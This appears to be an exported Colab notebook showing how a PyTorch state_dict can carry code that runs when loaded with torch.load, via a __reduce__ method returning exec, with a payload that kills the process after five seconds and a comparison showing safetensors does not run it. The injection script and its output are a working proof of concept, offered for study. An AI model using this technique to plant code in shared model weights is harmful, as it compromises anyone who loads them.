<a href="https://colab.research.google.com/github/Erickrus/llm/blob/main/torch_weights_hacking.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

#Torch Weights Hacking

Torch native save() method is vulnerable and can be used for malicious code injection.

Following codes demostrate how the code is injected into pytorch weights. The codes are based on hack.py.

https://github.com/FrankLeeeee/Blog-Notes/blob/main/2024-10-19-safetensor/hack.py

This code is only for study purpose. Do not abuse the code.

In [1]:
#@title installation
!pip3 install -q safetensors

In [1]:
#@title weights_hacking.py
%%writefile /content/weights_hacking.py
import argparse
import torch
import time
from torchvision.models import resnet50
import torch.distributed as dist
import torch.multiprocessing as mp
import os
from safetensors.torch import save_file, safe_open


AUTO_KILL = """
import os
import threading
from functools import partial

pid = os.getpid()

def inject_code(pid: int):
    print(f">>> inject_code({pid})")
    import time
    import os
    print(">>> time.sleep(5)")
    time.sleep(5)
    print(f">>> os.kill({pid}, 9)")
    os.kill(pid, 9)

wrapped_fn = partial(inject_code, pid)
injection_thread = threading.Thread(target=wrapped_fn)
injection_thread.start()
"""


def inject_malicious_code(obj, code_str):
    # bind a reduce fn to weights
    def reduce(self):
        return (exec, (code_str, ))

    # bind the reduce fn to the weights's __reduce__ method
    bound_reduce = reduce.__get__(obj, obj.__class__)
    setattr(obj, "__reduce__", bound_reduce)
    return obj


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("--hack", type=str, choices=["auto_kill"])
    parser.add_argument("--use-safetensor", default=False, action="store_true")
    return parser.parse_args()


def save_and_load_model(malicious_code_str, weights_name, use_safetensor=False):
    print(">>> model = resnet50()")
    model = resnet50()
    state_dict = model.state_dict()
    print(">>> inject_malicious_code(state_dict, malicious_code_str)")
    inject_malicious_code(state_dict, malicious_code_str)

    if not use_safetensor:
        print("not use_safetensor")
        print(">>> torch.save(state_dict, weights_name)")
        torch.save(state_dict, weights_name)
        print(">>> torch.load(weights_name)")
        torch.load(weights_name)
    else:
        print("use_safetensor")
        weights_name = weights_name.replace(".bin", ".safetensors")
        print(">>> save_file(state_dict, weights_name)")
        save_file(state_dict, weights_name)
        print('>>> safe_open(weights_name, framework="pt")')
        safe_open(weights_name, framework="pt")


def main():
    args = parse_args()

    if args.hack == "auto_kill":
        save_and_load_model(AUTO_KILL, "hacked_weights.bin", args.use_safetensor)

        if args.use_safetensor:
            print("You program will keep running forever, please kill it manually")
        else:
            print("You program will be killed after 5 seconds")
        i = 0
        while True:
            # keep it running
            time.sleep(1)
            print("still running")
    else:
        raise ValueError(f"Unknown hack: {args.hack}")


if __name__ == "__main__":
    main()

Writing /content/weights_hacking.py


In [2]:
#@title weights injection using torch native save
!python3 weights_hacking.py \
  --hack auto_kill

>>> model = resnet50()
>>> inject_malicious_code(state_dict, malicious_code_str)
not use_safetensor
>>> torch.save(state_dict, weights_name)
>>> torch.load(weights_name)
/content/weights_hacking.py:63: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open

In [3]:
#@title weights injection using safetensors
!python3 weights_hacking.py \
  --hack auto_kill \
  --use-safetensor

>>> model = resnet50()
>>> inject_malicious_code(state_dict, malicious_code_str)
use_safetensor
>>> save_file(state_dict, weights_name)
>>> safe_open(weights_name, framework="pt")
You program will keep running forever, please kill it manually
still running
still running
still running
still running
still running
still running
still running
still running
still running
still running
Traceback (most recent call last):
  File "/content/weights_hacking.py", line 93, in <module>
    main()
  File "/content/weights_hacking.py", line 86, in main
    time.sleep(1)
KeyboardInterrupt
Exception ignored in atexit callback: <function dump_compile_times at 0x7e3d68db8430>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/torch/_dynamo/utils.py", line 335, in dump_compile_times
    log.info(compile_times(repr="str", aggregate=True))
  File "/usr/local/lib/python3.10/dist-packages/torch/_dynamo/utils.py", line 322, in compile_times
    out += tabulate(rows, headers=("Fun